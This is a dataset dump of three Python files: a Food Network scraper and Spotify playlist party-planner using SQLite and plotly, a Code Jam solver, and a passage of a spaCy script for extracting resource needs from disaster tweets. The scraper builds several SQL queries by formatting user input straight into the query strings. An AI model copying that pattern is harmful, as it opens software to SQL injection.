| seq_id (string, 7–11 chars) | text (string, 156–1.7M chars) | repo_name (string, 7–125 chars) | sub_path (string, 4–132 chars) | file_name (string, 4–77 chars) | file_ext (string, 6 classes) | file_size_in_byte (int64, 156–1.7M) | program_lang (string, 1 class) | lang (string, 38 classes) | doc_type (string, 1 class) | stars (int64, 0–24.2k, may be null) | dataset (string, 1 class) | pt (string, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
36259278100
|
import requests
from bs4 import BeautifulSoup
import json
import secrets
from requests_oauthlib import OAuth1
from operator import itemgetter
import sqlite3
import csv
import base64
import itertools
import plotly.plotly as py
import plotly.graph_objs as go
import webbrowser
spotifybase = "https://accounts.spotify.com/api/token"
spotifyplay = "https://api.spotify.com/v1/search"
foodnet = "https://www.foodnetwork.com/profiles/talent"
spotify_client = secrets.client_id
spotify_secret = secrets.client_secret
auth = (spotify_client, spotify_secret)
grant_type = 'client_credentials'
CACHE_FNAME = 'final_cache.json'
DBNAME = 'food.db'
CHEFS = 'chefs.json'
DISHES = 'dishes.json'
flavor_dict = {'Aaron McCargo Jr.': 'American',
'Aarti Sequeira': 'South Asian',
'Aarón Sánchez': 'Latin',
'Adam Gertler': 'BBQ',
'Aida Mollenkamp': 'Innovative',
'Alex Guarnaschelli': 'Traditional Home-Cooking',
'Amanda Freitag': 'Traditional Home-Cooking',
'Amy Thielen': 'Traditional Home-Cooking',
'Andrew Zimmern': 'Innovative',
'Anne Burrell': 'Rustic',
'Anne Thornton': 'Sweet Treats',
'Ayesha Curry': 'Home-Cooking',
'Bob Blumer': 'Innovative',
'Bobby Flay': 'American',
'Brian Boitano': 'Innovative',
'Buddy Valastro': 'Sweet Treats',
'Carla Hall': 'Southern Comfort',
'Cat Cora': 'Misc.',
'Chris Santos': 'Innovative',
'Claire Robinson': 'Home-Cooking',
'Curtis Stone': 'Home-Cooking',
'Daisy Martinez': 'Latin',
'Damaris Phillips': 'Southern Comfort',
'Danny Boome': 'Healthy',
'Daphne Brogdon': 'Home-Cooking',
'Dave Lieberman': 'Home-Cooking',
'Donatella Arpaia': 'Home-Cooking',
'Duff Goldman': 'Sweet Treats',
'Eddie Jackson': 'Healthy',
'Ellie Krieger': 'Healthy',
'Emeril Lagasse': 'Misc.',
'Food Network Kitchen': 'Misc.',
'Geoffrey Zakarian': 'Modern American',
'George Duran': 'Global Cuisine',
'Giada De Laurentiis': 'Italian',
'Graham Elliot': 'Misc.',
'Guy Fieri': 'American',
'Ina Garten': 'Home-Cooking',
'Ingrid Hoffmann': 'Misc.',
'Jamie Deen': 'BBQ',
'Jamie Oliver': 'Healthy',
'Janet Johnston': 'Home-Cooked',
'Jeff Corwin': 'Latin',
'Jeff Mauro': 'Misc.',
'Jet Tila': 'East Asian',
'Joey Fatone': 'American',
'Jose Garces': 'Latin',
'Judy Joo': 'Misc.',
'Katie Lee': 'Misc.',
'Keegan Gerhard': 'Sweet Treats',
'Kerry Vincent': 'Sweet Treats',
'Lorraine Pascale': 'Home-Cooking',
'Maneet Chauhan': 'South Asian',
'Marc Murphy': 'Modern American',
'Marcela Valladolid': 'Latin',
'Marcus Samuelsson': 'Misc.',
'Mario Batali': 'Italian',
'Mary Nolan': 'Everyday',
'Masaharu Morimoto': 'East Asian',
"Melissa d'Arabian": 'Healthy',
'Michael Chiarello': 'Italian',
'Michael Symon': 'Misc.',
'Nancy Fuller': 'Southern Comfort',
'Nigella Lawson': 'Home-Cooking',
'Patricia Heaton': 'American',
'Paula Deen': 'Southern',
'Rachael Ray': 'Everyday',
'Ree Drummond': 'Southern Comfort',
'Robert Irvine': 'American',
'Robin Miller': 'Everyday',
'Roger Mooking': 'Global Cuisine',
'Ron Ben-Israel': 'Sweet Treats',
'Sandra Lee': 'American',
'Scott Conant': 'Italian',
'Sherry Yard': 'Sweet Treats',
'Sunny Anderson': 'Southern Comfort',
'Ted Allen': 'American',
'The Hearty Boys': 'Innovative',
'The Neelys': 'BBQ',
'Tia Mowry': 'Everyday',
'Tregaye Fraser': 'Innovative',
'Trisha Yearwood': 'Southern Comfort',
'Tyler Florence': 'Home-Cooking',
'Valerie Bertinelli': 'Misc.',
'Warren Brown': 'Sweet Treats'}
try:
cache_file = open(CACHE_FNAME, 'r')
cache_contents = cache_file.read()
CACHE_DICTION = json.loads(cache_contents)
cache_file.close()
except:
CACHE_DICTION = {}
try:
cache_file = open(CHEFS, 'r')
cache_contents = cache_file.read()
CHEF_DICTION = json.loads(cache_contents)
cache_file.close()
except:
CHEF_DICTION = {}
try:
cache_file = open(DISHES, 'r')
cache_contents = cache_file.read()
DISH_DICTION = json.loads(cache_contents)
cache_file.close()
except:
DISH_DICTION = {}
def get_spotify_token(url, auth):
params = {'grant_type': grant_type}
# if url in CACHE_DICTION:
# access_token = CACHE_DICTION[url][17:100]
# return access_token
# else:
resp = requests.post(url, data=params, auth=auth)
resp_data = json.loads(resp.text)
access_token = resp_data["access_token"]
CACHE_DICTION[url] = resp.text
dumped_json_cache = json.dumps(CACHE_DICTION)
fw = open(CACHE_FNAME,"w")
fw.write(dumped_json_cache)
fw.close()
return access_token
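# Added note (not in the original file): the Spotify client-credentials token
# endpoint typically answers with JSON of the form
#   {"access_token": "...", "token_type": "Bearer", "expires_in": 3600},
# which is why only resp_data["access_token"] is read above; the expiry field is
# not checked when a cached response is reused.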
def make_request_using_cache(url, headers=None):
if url in CACHE_DICTION:
return CACHE_DICTION[url]
else:
if headers is None:
resp = requests.get(url)
else:
resp = requests.get(url, headers=headers)
CACHE_DICTION[url] = resp.text
dumped_json_cache = json.dumps(CACHE_DICTION)
fw = open(CACHE_FNAME,"w")
fw.write(dumped_json_cache)
fw.close()
return CACHE_DICTION[url]
def get_spotify_playlist(search_term):
end = ["party", "graph", "term"]
params = {'q': search_term}
url = "{}?type=playlist&limit=5&q=".format(spotifyplay) + search_term
access_token = get_spotify_token(spotifybase, auth)
authorization_header = {"Authorization":"Bearer {}".format(access_token)}
response_string = make_request_using_cache(url, authorization_header)
response = json.loads(response_string)
num = 0
spotify_list = []
for r in response:
for i in range(5):
num += 1
spotify_list.append((response[r]["items"][i]["name"], str(response[r]["items"][i]["tracks"]["total"])))
print(str(num) + ". " + response[r]["items"][i]["name"] + " --- " + str(response[r]["items"][i]["tracks"]["total"]))
print("Do you want to see a bar graph comparing these playlist's lengths,"
"look up another term, or"
" do you want to go start throwing your awesome party?")
response = input("Please enter 'party', 'term', or 'graph': ")
while response not in end:
response = input("Please enter 'party', 'term', or 'graph': ")
if response == 'party':
print("Bye! Have fun!")
exit()
elif response == 'graph':
bar_graph_spotify(spotify_list)
print("Alright! Time for you to go throw the best party out there! See you later!")
exit()
elif response == 'term':
response = input("Please enter a new search term! ")
get_spotify_playlist(response)
return spotify_list
def init_db():
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
statement = '''
DROP TABLE IF EXISTS 'Chefs';
'''
cur.execute(statement)
statement = '''
DROP TABLE IF EXISTS 'Dishes';
'''
cur.execute(statement)
conn.commit()
statement = '''
CREATE TABLE 'Chefs' (
'Id' INTEGER PRIMARY KEY AUTOINCREMENT,
'FirstName' TEXT NOT NULL,
'LastName' TEXT NOT NULL,
'ChefUrl' TEXT NOT NULL,
'PopularRecipe' TEXT,
'FlavorProfile' TEXT
);
'''
cur.execute(statement)
statement = '''
CREATE TABLE 'Dishes' (
'Id' INTEGER PRIMARY KEY AUTOINCREMENT,
'DishName' TEXT NOT NULL,
'DishUrl' TEXT NOT NULL,
'ChefID' INTEGER,
'Type' TEXT NOT NULL,
'LevelDifficulty' TEXT NOT NULL,
'Rating' INTEGER
);
'''
cur.execute(statement)
conn.commit()
conn.close()
class Chef:
def __init__(self, FirstName, LastName, ChefUrl=None):
self.FirstName = FirstName
self.LastName = LastName
self.ChefUrl = ChefUrl
self.full_name = FirstName + " " + LastName
if ChefUrl is not None:
unique_page_text = make_request_using_cache(ChefUrl)
unique_page_soup = BeautifulSoup(unique_page_text, 'html.parser')
if self.full_name in flavor_dict:
try:
most_popular_block = unique_page_soup.find(class_ = "m-MediaBlock o-Capsule__m-MediaBlock m-MediaBlock--recipe")
most_popular = most_popular_block.find(class_="m-MediaBlock__a-HeadlineText").text
self.FlavorProfile = flavor_dict[self.full_name]
if self.full_name in ("Bobby Flay", "Duff Goldman", "Melissa d'Arabian", "Nigella Lawson"):
recipes_url = ChefUrl + "/recipes"
recipes_text = make_request_using_cache(recipes_url)
recipes_soup = BeautifulSoup(recipes_text, 'html.parser')
recipes_list = recipes_soup.find(class_ = "l-List")
most_popular = recipes_list.find(class_ = "m-MediaBlock__a-HeadlineText").text
except:
most_popular = "N/A"
else:
most_popular = "N/A"
self.FlavorProfile = "N/A"
self.PopularRecipe = most_popular
else:
self.PopularRecipe = "N/A"
class Dish:
def __init__(self, DishName, DishUrl, Rating, Chef):
dish_types = ["Side Dish", "Main Dish", "Snack Dish", "Dessert"]
self.DishName = DishName
self.DishUrl = "http:" + DishUrl
self.Rating = Rating
self.Chef = Chef
dish_type = "Unknown"
dish_page_text = make_request_using_cache(self.DishUrl)
dish_page_soup = BeautifulSoup(dish_page_text, 'html.parser')
try:
level_all = dish_page_soup.find(class_ = "o-RecipeInfo o-Level")
level = level_all.find(class_ = "o-RecipeInfo__a-Description").text
except:
level = "Unknown"
try:
tags = dish_page_soup.find_all(class_ = "o-Capsule__a-Tag a-Tag")
for t in tags:
if t.text in dish_types:
dish_type = t.text
else:
dish_type = "Unknown"
except:
dish_type = "Unknown"
pass
self.Type = dish_type
self.LevelDifficulty = level
pass
def get_chef_info():
init_page_text = make_request_using_cache(foodnet)
init_page_soup = BeautifulSoup(init_page_text, 'html.parser')
name_list = init_page_soup.find_all(class_="m-PromoList__a-ListItem")
chef_list = []
num = 0
for n in name_list:
first_name = n.text.split(" ")[0]
second_word = n.text.split(" ")[1]
last_name = n.text.split(" ")[1:]
if len(last_name) == 2:
last_name = last_name[0] + " " + last_name [1]
elif len(last_name) == 3:
last_name = last_name[0] + " " + last_name [1] + " " + last_name [2]
else:
last_name = last_name[0]
if second_word == "and":
first_name = n.text.split(" ")[0] + " and " + n.text.split(" ")[2]
last_name = n.text.split(" ")[3]
chef_url = "https:" + n.find('a')['href']
n = Chef(first_name, last_name, chef_url)
chef_list.append(n)
chef = {"FirstName": n.FirstName,
"LastName": n.LastName,
"ChefUrl": n.ChefUrl,
"PopularRecipe": n.PopularRecipe,
"FlavorProfile": n.FlavorProfile}
CHEF_DICTION[n.full_name] = chef
chef_string = json.dumps(CHEF_DICTION, indent = 4)
fw = open(CHEFS,"w")
fw.write(chef_string)
fw.close()
return chef_list
def get_dish_info():
chefs = get_chef_info()
dishes_list = []
for c in chefs:
chef_dishes = []
if c.full_name in flavor_dict:
dishes_url = c.ChefUrl + "/recipes"
init_page_text = make_request_using_cache(dishes_url)
init_page_soup = BeautifulSoup(init_page_text, 'html.parser')
try:
next_button = init_page_soup.find(class_ = "o-Pagination__a-Button o-Pagination__a-NextButton")
except:
next_button = "No"
big_list = init_page_soup.find(class_="l-List")
ratings_list = []
try:
dish_list = big_list.find_all(class_ = "m-MediaBlock__a-Headline")
except:
pass
try:
ratings = big_list.find_all(class_ = "gig-rating-stars")['title']
for r in ratings:
print(r)
ratings_list.append(ratings)
except:
ratings = "Unknown"
ratings_list.append(ratings)
try:
for d in dish_list:
dish_name = d.text
dish_url = d.find('a')["href"]
dish_rating = "5 out of 5"
d = Dish(dish_name, dish_url, dish_rating, c.full_name)
dishes_list.append(d)
dish = {"DishName": d.DishName,
"DishUrl": d.DishUrl,
"DishRating": d.Rating,
"Type": d.Type,
"LevelDifficulty": d.LevelDifficulty}
chef_dishes.append(dish)
except:
pass
# num = 1
# while next_button != "No":
# num += 1
# next_url = dishes_url + "/trending-/p/" + str(num)
# next_page = make_request_using_cache(next_url)
# next_page_soup = BeautifulSoup(next_page, 'html.parser')
# try:
# next_button = init_page_soup.find(class_ = "o-Pagination__a-Button o-Pagination__a-NextButton")
# except:
# next_button = "No"
# big_list = next_page_soup.find(class_="l-List")
# ratings_list = []
# try:
# dish_list = big_list.find_all(class_ = "m-MediaBlock__a-Headline")
# except:
# dish_list = "no dishes"
# try:
# ratings = big_list.find_all(class_ = "gig-rating-stars")['title']
# for r in ratings:
# print(r)
# ratings_list.append(ratings)
# except:
# ratings = "Unknown"
# ratings_list.append(ratings)
# try:
# for d in dish_list:
# dish_name = d.text
# dish_url = d.find('a')["href"]
# dish_rating = ""
# d = Dish(dish_name, dish_url, dish_rating, c.full_name)
# dishes_list.append(d)
# dish = {"DishName": d.DishName,
# "DishUrl": d.DishUrl,
# "DishRating": d.Rating,
# "Type": d.Type,
# "LevelDifficulty": d.LevelDifficulty}
# chef_dishes.append(dish)
# except:
# pass
# if num == 2:
# break
# try:
# next_button = next_page_soup.find(class_ = "o-Pagination__a-Button o-Pagination__a-NextButton").text
# except:
# next_button = "No"
DISH_DICTION[c.full_name] = chef_dishes
dish_string = json.dumps(DISH_DICTION, indent = 4)
fw = open(DISHES,"w")
fw.write(dish_string)
fw.close()
#print(dishes_list[:30])
return dishes_list
def insert_data():
try:
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
except sqlite3.Error as e:
print(e)
#
# #print('Inserting Data.')
with open(CHEFS) as json_data:
cjson = json.load(json_data)
for c, d in cjson.items():
insertion = (None, d["FirstName"], d["LastName"], d["ChefUrl"], d["PopularRecipe"], d["FlavorProfile"])
statement = 'INSERT INTO "Chefs" '
statement += 'VALUES (?, ?, ?, ?, ?, ?)'
cur.execute(statement, insertion)
chef_dict = {}
statement = '''SELECT Id, FirstName, LastName FROM Chefs'''
cur.execute(statement)
for chef_info in cur:
full_name = chef_info[1] + " " + chef_info [2]
chef_dict[full_name] = chef_info[0]
with open(DISHES) as json_data:
cjson = json.load(json_data)
for c, d in cjson.items():
full_name = c
for i in d:
insertion = (None, i["DishName"].replace("\n", ""), i["DishUrl"], chef_dict[full_name], i["Type"], i["LevelDifficulty"].replace("\n", ""), i["DishRating"])
statement = 'INSERT INTO "Dishes" '
statement += 'VALUES (?, ?, ?, ?, ?, ?, ?)'
cur.execute(statement, insertion)
conn.commit()
conn.close()
def pie_chart(flavor_chef):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
labels = []
values = []
for f in flavor_chef:
labels.append(f)
first_name = f.split(" ")[0]
second_word = f.split(" ")[1]
last_name = f.split(" ")[1:]
if len(last_name) == 2:
last_name = last_name[0] + " " + last_name [1]
elif len(last_name) == 3:
last_name = last_name[0] + " " + last_name [1] + " " + last_name [2]
else:
last_name = last_name[0]
if second_word == "and":
first_name = f.split(" ")[0] + " and " + f.split(" ")[2]
last_name = f.split(" ")[3]
query = '''
SELECT COUNT(*)
FROM Chefs as c
JOIN Dishes as d
ON c.ID = d.ChefID
WHERE c.FirstName = "{}" AND c.LastName = "{}"
GROUP BY c.ID
'''.format(first_name, last_name)
value = cur.execute(query)
for v in value:
values.append(v[0])
trace = go.Pie(labels=labels, values=values)
py.plot([trace], filename='Flavors')
def bar_graph_spotify(spotify):
x = []
y = []
for w, z in spotify:
x.append(w)
y.append(z)
data = [go.Bar(
x = x,
y = y
)]
py.plot(data, filename='bar-Spotify')
def bar_graph_type(command):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
chef_types = {}
first_name = command.split(" ")[0]
second_word = command.split(" ")[1]
last_name = command.split(" ")[1:]
if len(last_name) == 2:
last_name = last_name[0] + " " + last_name [1]
elif len(last_name) == 3:
last_name = last_name[0] + " " + last_name [1] + " " + last_name [2]
else:
last_name = last_name[0]
if second_word == "and":
first_name = command.split(" ")[0] + " and " + command.split(" ")[2]
last_name = command.split(" ")[3]
query = '''
SELECT COUNT(*), d.Type
FROM Chefs as c
JOIN Dishes as d
ON c.ID = d.ChefID
WHERE c.FirstName = "{}" AND c.LastName = "{}"
GROUP BY d.Type
'''.format(first_name, last_name)
types = cur.execute(query)
x = []
y = []
for t in types:
print(t)
x.append(t[1])
y.append(t[0])
data = [go.Bar(
x = x,
y = y
)]
py.plot(data, filename='bar-Type')
def process_flavors(command):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
flavor_chef = []
query = '''
SELECT FirstName, LastName
FROM Chefs
WHERE FlavorProfile = "{}"
'''.format(command)
chefs = cur.execute(query)
for c in chefs:
full_name = c[0] + " " + c[1]
flavor_chef.append(full_name)
conn.close()
return flavor_chef
def process_chef(command):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
dishes_o_chefs = []
first_name = command.split(" ")[0]
second_word = command.split(" ")[1]
last_name = command.split(" ")[1:]
if len(last_name) == 2:
last_name = last_name[0] + " " + last_name [1]
elif len(last_name) == 3:
last_name = last_name[0] + " " + last_name [1] + " " + last_name [2]
else:
last_name = last_name[0]
if second_word == "and":
first_name = command.split(" ")[0] + " and " + command.split(" ")[2]
last_name = command.split(" ")[3]
query = '''
SELECT d.DishName, d.DishUrl, d.Rating, d.Type, d.LevelDifficulty
FROM Chefs as c
JOIN Dishes as d
ON c.ID = d.ChefID
WHERE c.FirstName = "{}" AND c.LastName = "{}"
'''.format(first_name, last_name)
dishes = cur.execute(query)
for d in dishes:
dish = {}
formatted = d[0] + "--- " + d[3] + ", " + d[2] + ", Level: " + d[4]
dish[d[0]] = [d[1], d[2], d[3], d[4]]
dishes_o_chefs.append(dish)
conn.close()
return dishes_o_chefs
def process_dish(command):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
dish = []
query = '''
SELECT d.DishName, d.DishUrl, d.Rating, d.Type, d.LevelDifficulty
FROM Chefs as c
JOIN Dishes as d
ON c.ID = d.ChefID
WHERE d.Type = "{}"
LIMIT 1
'''.format(command)
dishes = cur.execute(query)
for d in dishes:
one_dish = {}
formatted = d[0] + "--- " + d[3] + ", " + d[2] + ", Level: " + d[4]
one_dish[d[0]] = [d[1], d[2], d[3], d[4]]
dish.append(one_dish)
conn.close()
return dish
def flavors():
flavors = ["American", "BBQ", "East Asian", "Everyday", "Global Cuisine", "Healthy",
"Home-Cooking","Innovative","Italian","Latin","Misc.","Modern American",
"Rustic","Southern Comfort","South Asian","Sweet Treats","Trad. Home-Cooking", "exit"]
one_two = ["1", "2", "exit"]
print("Here are the flavors we've put together for your absolutely amazing party: \n"
"American BBQ East Asian\n"
"Everyday Global Cuisine Healthy\n"
"Home-Cooking Innovative Italian\n"
"Latin Misc. Modern American\n"
"Rustic Southern Comfort South Asian\n"
"Sweet Treats Trad. Home-Cooking")
response = input("Please enter a single flavor so we can pull up a list "
"of chefs from FoodNetwork for you! ")
while response not in flavors:
response = input("Whoops! That doesn't look quite right, please try again! ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
flavor_chef = process_flavors(response)
num_chef = 0
print("-"*40, "\n", "CHEFS WITH A ", response, " FLAVOR", "\n", "-"*40)
for f in flavor_chef:
num_chef +=1
print(str(num_chef) + ". " + f)
print("Cool! So you've got a couple of options now! Path 1: You can choose a chef to look at or we can give you"
"a dish from this flavor! Path 2: You can open a plotly pie chart showing the amount of recipes"
"each of these chefs have! Which one do you want to do?")
response = str(input("Enter '1' or '2' for either path: "))
while response not in one_two:
response = input("Enter '1' or '2' for either path: ")
if response == '1':
chef_dish(flavor_chef)
elif response == '2':
pie_chart(flavor_chef)
print("Alright now let's choose a chef/dish!")
chef_dish(flavor_chef)
elif response == 'exit':
print("Bye! Hope your party's a blast!")
exit()
return flavor_chef
def chef_dish(flavor_chef):
chef_dish = ["chef", "dish", "exit"]
kinds = ["Snack", "Side Dish", "Main Dish", "Dessert", "exit"]
response = input("Enter 'chef' or 'dish': ")
while response not in chef_dish:
response = input("Please enter 'chef' or 'dish': ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
elif response == 'chef':
response = input("Nice! Type in the name of the chef you want to look at: ")
while response not in flavor_chef:
response = input("Oops! Did you type that in right? Try again: ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
chef(response)
elif response == 'dish':
print("Solid! Do you want a snack, side, main dish, or dessert?")
response = input("Please enter 'Snack', 'Side Dish', 'Main Dish', or 'Dessert': ")
while response not in kinds:
response = input("Oops! Did you type that in right? Try again: ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
dish(response)
return 0
def dish(kind):
music_flavor = ["music", "flavor"]
yes_no = ["yes", "no", "exit"]
one_two = ["1", "2", "exit"]
print("-"*15, "\n", "A ", kind, "DISH" "\n", "-"*15)
dish = process_dish(kind)
for d in dish:
for i in d:
formatted = i + " --- " + d[i][2] + ", " + d[i][1] + ", Level: " + d[i][3].replace(" ", "")
print(formatted)
print("\n Do you want to go to the url for this dish?")
response = input("Enter 'yes' to go to the url or enter 'no' to go back to flavors: ")
while response not in yes_no:
response = input("Please enter 'yes' or 'no': ")
if response == "yes":
for d in dish:
url = d[i][0]
print("Launching " + url + " in browser!")
webbrowser.open(url)
print("Are you satisfied with your recipe? Do you want to go look at music?")
response = input("Enter 'music' for music or enter 'flavor' to go back to the flavors ")
while response not in music_flavor:
response = input("Please try again: ")
if response == 'music':
response = input("Enter a search term for Spotify: ")
spotify = get_spotify_playlist(response)
bar_graph_spotify(spotify)
elif response == 'flavor':
flavor_chef = flavors()
print("Cool! So you've got a couple of options now! Path 1: You can choose a chef to look at or we can give you "
" a dish from this flavor! Path 2: You can open a plotly pie chart showing the amount of recipes "
" each of these chefs have! Which one do you want to do?")
response = str(input("Enter '1' or '2' for either path: "))
while response not in one_two:
response = input("Enter '1' or '2' for either path: ")
if response == '1':
chef_dish(flavor_chef)
if response == '2':
pie_chart(flavor_chef)
elif response == "no":
flavor_chef = flavors()
chef_dish(flavor_chef)
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
return 0
def chef(name):
music_flavor = ["music", "flavor", "exit"]
one_two = ["one", "two", "exit"]
num_chef_dish = 0
print("-"*30, "\n", "DISHES BY ", name, "\n" + "-"*30)
dishes_o_chefs = process_chef(name)
dish_nums = []
for d in dishes_o_chefs:
for i in d:
num_chef_dish += 1
formatted = str(num_chef_dish) + ". " + i + " --- " + d[i][2] + ", " + d[i][1] + ", Level: " + d[i][3].replace(" ", "")
print(formatted)
dish_nums.append((num_chef_dish - 1, d[i][0]))
response = input("Enter a number to go to that dish's url, enter 'flavor' to go back to the flavors, or"
"enter 'graph' to see a graph of this chef's number of main, side, snack, and dessert dishes! ")
if response == "flavor":
flavor_chef = flavors()
chef_dish(flavor_chef)
elif response.isdigit() == True:
# try:
url = dish_nums[(int(response)-1)][1]
print(url)
print("Launching " + url + " in browser!")
webbrowser.open(url)
# except:
# print("URL Unknown")
print("Are you satisfied with your recipe? Do you want to go look at music?")
response = input("Enter 'music' for music or enter 'flavor' to go back to the flavors ")
while response not in music_flavor:
response = input("Please try again: ")
if response == 'music':
response = input("Enter a search term for Spotify: ")
get_spotify_playlist(response)
elif response == 'flavor':
flavor_chef = flavors()
print("Cool! So you've got a couple of options now! Path 1: You can choose a chef to look at or we can give you"
" a dish from this flavor! Path 2: You can open a plotly pie chart showing the amount of recipes"
" each of these chefs have! Which one do you want to do?")
response = str(input("Enter '1' or '2' for either path: "))
while response not in one_two:
response = input("Enter '1' or '2' for either path: ")
if response == '1':
chef_dish(flavor_chef)
elif response == '2':
pie_chart(flavor_chef)
print("Great! Let's go look at some chef/dishes from this flavor now!")
chef_dish(flavor_chef)
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
elif response == 'graph':
bar_graph_type(name)
print("Nice!")
response = input("Enter a number to go to that dish's url, enter 'flavor' to go back to the flavors, or"
"enter 'graph' to see a graph of this chef's number of main, side, snack, and dessert dishes! ")
if response == "flavor":
flavor_chef = flavors()
chef_dish(flavor_chef)
elif response.isdigit() == True:
#try:
url = dish_nums[(int(response)-1)][1]
print(url)
print("Launching " + url + " in browser!")
webbrowser.open(url)
# except:
# print("URL Unknown")
print("Are you satisfied with your recipe? Do you want to go look at music?")
response = input("Enter 'music' for music or enter 'flavor' to go back to the flavors ")
while response not in music_flavor:
response = input("Please try again: ")
if response == 'music':
response = input("Enter a search term for Spotify: ")
get_spotify_playlist(response)
elif response == 'flavor':
flavor_chef = flavors()
print("Cool! So you've got a couple of options now! Path 1: You can choose a chef to look at or we can give you"
"a dish from this flavor! Path 2: You can open a plotly pie chart showing the amount of recipes"
"each of these chefs have! Which one do you want to do?")
response = str(input("Enter '1' or '2' for either path: "))
while response not in one_two:
response = input("Enter '1' or '2' for either path: ")
if response == '1':
chef_dish(flavor_chef)
if response == '2':
pie_chart(flavor_chef)
print("Great! Let's go look at some chef/dishes from this flavor now!")
chef_dish(flavor_chef)
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
else:
print("Hmmm. That doesn't seem right!")
response = input("Enter 'flavor' to go back to the flavors! ")
while response != 'flavor':
print("Hmmm. That doesn't seem right!")
response = input("Enter 'flavor' to go back to the flavors! ")
flavor_chef = flavors()
chef_dish(flavor_chef)
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
else:
print("Hmmm. That doesn't seem right!")
response = input("Enter 'flavor' to go back to the flavors! ")
while response != 'flavor':
print("Hmmm. That doesn't seem right!")
response = input("Enter 'flavor' to go back to the flavors! ")
flavor_chef = flavors()
chef_dish(flavor_chef)
def interactive_prompt():
one_two = ["1", "2", "exit"]
print("-"*30, "\n", "PARTY PLANNING PROGRAM \n", "-"*30)
print("Hey! So you wanna plan a party? Don't know where to start? Look no "
"further! We'll help you with the two most important parts of any party: "
"food and music! (You've gotta take care of the conversation on your own, "
"though, sorry!)")
response = input("Enter anything if this is the program you've been looking for "
"your whole life (enter 'exit' if you want to leave!): ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
print("With P^3 you can get delicious recipes and great music for the "
"best party you've ever thrown. Yes, even better than your neighbor Janet's "
"Halloween party last year.")
response = input("Cool right? ")
if response == 'exit':
print("Bye! Hope your party's a blast!")
exit()
print("Yea, we think so too. Let's get started.")
flavor_chef = flavors()
if __name__=="__main__":
#get_dish_info()
#init_db()
#insert_data()
interactive_prompt()
#get_spotify_playlist("country")
|
jntoma/finalproj206
|
final_food.py
|
final_food.py
|
py
| 33,382 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4470012110
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 10 23:13:16 2015
@author: maxshashoua
"""
file = list(open("Standing_Ovation_Large.in"))
for i in range(len(file)):
file[i] = file[i].strip("\n").strip()
T = int(file[0])
Total = T
data = file[1:]
""""
for l in data:
t = l[0]
s = 1
friends = 0
raw = l[2:]
# j in raw is each character in the raw data for number of people in one puzzle
for j in raw:
s -= 1
s += int(j)
if s == 0:
friends += 1
s += 1
print('Case #' + str(Total - T + 1) + " " + str(friends))
T -= 1
"""
f = open("Standing_Ovation_Large_Attempt.txt", "w")
for l in data:
t = l[0]
s = 1
friends = 0
rawP = l.split(" ")
raw = rawP[1]
# j in raw is each character in the raw data for number of people in one puzzle
for j in raw:
s -= 1
s += int(j)
if s == 0:
friends += 1
s += 1
f.write('Case #' + str(Total - T + 1) + " " + str(friends) + "\n")
print('Case #' + str(Total - T + 1) + " " + str(friends) + "\n")
T -= 1
print("done")
|
emsha/Code-Jam
|
standingovation.d/Standing_Ovation_Solver.py
|
Standing_Ovation_Solver.py
|
py
| 1,142 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5259664413
|
import re
#import CMUTweetTagger
#import cPickle
from collections import defaultdict
import pickle
from nltk.corpus import wordnet as wn
from itertools import product
import spacy
from spacy.symbols import *
from nltk import Tree
import nltk
nlp=spacy.load('en')
np_labels=set(['nsubj','dobj','pobj','iobj','conj','nsubjpass','appos','nmod','poss','parataxis','advmod','advcl'])
subj_labels=set(['nsubj','nsubjpass'])
need_verb_list=['need','require','want','lack']
send_verb_list=['send','give','donate','transfer','distribute','aid','help','procure']
common_resource=['food','water','medicine','tent','clothes','communication','transport','infrastructure','shelter','internet','sanitation','hospital','donations']
modifiers=['nummod','compound','amod','punct']
after_clause_modifier=['relcl','acl','ccomp','xcomp','acomp','punct']#,'nn','quantmod','nmod','hmod','infmod']
verb_count={}
resource_array=[]
modified_array=[]
# nepal_stop_list=['nepal','earthquake','quake','nepalese']
nepal_stop_list=[]
tel_no="([+]?[0]?[1-9][0-9\s]*[-]?[0-9\s]+)"
email="([a-zA-Z0-9]?[a-zA-Z0-9_.]+[@][a-zA-Z]*[.](com|net|edu|in|org|en))"
web_url="http:[a-zA-Z._0-9/]+[a-zA-Z0-9]"
entity_type_list=['NORP','ORG','GPE','PERSON']
quant_no="([0-9]*[,.]?[0-9]+[k]?)"
need_send_verb_list=['need','require','want','lack','send','give','donate','transfer','distribute','aid','help','support','procure']
# def quant_no(resource):
# return [i for re.findall(quant_no,resource)]
def modifier_word(word):
modified_word=word.orth_
while word.n_lefts+word.n_rights==1 and word.dep_.lower() in modifiers:
word=[child for child in word.children][0]
modified_word=word.orth_+" "+modified_word
return modified_word
def tok_format(tok):
return "_".join([tok.orth_, tok.dep_,tok.ent_type_])
def to_nltk_tree(node):
if node.n_lefts + node.n_rights > 0:
return Tree(tok_format(node), [to_nltk_tree(child) for child in node.children])
else:
return tok_format(node)
def get_children(word,resource_array,modified_array):
#print(word,word.dep_)
for child in word.children:
if child.dep_.lower() in modifiers:
get_word=modifier_word(child)+" "+word.orth_+"<_>"+word.dep_
modified_array.append(get_word)
if child.dep_.lower()=='prep' or child.dep_.lower()=='punct':
get_children(child,resource_array,modified_array)
if child.dep_.lower() in after_clause_modifier:
#print(child, child.dep_)
get_children(child,resource_array,modified_array)
if child.dep_.lower() in np_labels:
get_children(child,resource_array,modified_array)
resource_array.append(child.orth_+"<_>"+child.dep_)
else:
